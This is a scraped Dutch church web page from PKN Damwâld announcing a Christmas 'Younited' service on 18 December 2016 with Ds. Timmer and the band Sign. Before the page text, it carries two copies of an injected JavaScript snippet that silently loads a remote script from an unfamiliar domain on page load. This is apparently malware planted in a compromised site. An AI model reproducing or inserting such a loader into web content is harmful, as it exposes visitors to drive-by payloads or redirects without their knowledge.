;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Beleef Kerst ! - PKN Damwâld

Beleef Kerst !

Gepubliceerd op: zaterdag 10 december 2016
Thema: Beleef Kerst!
Datum: zondag 18 december 2016
Tijd: 19.30
Spreker: Ds. Timmer
Band: Sign
Locatie: De Ontmoeting, Foarwei 48 te Damwâld

De decembermaand is in volle gang en dit betekent dat het weer tijd wordt voor een Younited dienst! Dit belooft weer een prachtige dienst te worden waarin het kerstfeest centraal staat. De band Sign uit Damwâld gaat zowel bekende als onbekende kerstnummers spelen en Ds. Timmer zal tijdens deze dienst een ‘praatje’ houden over het kerstfeest.
We maken er een groot feest van met samenhang van toneel, film en muziek… Maar dan in een compleet ander jasje. Ben je ook nieuwsgierig naar ons kerstfeest? We zien je graag bij deze Younited dienst, zondag 18 december 2016 om 19:30u. in de ‘Ontmoeting’ te Damwâld?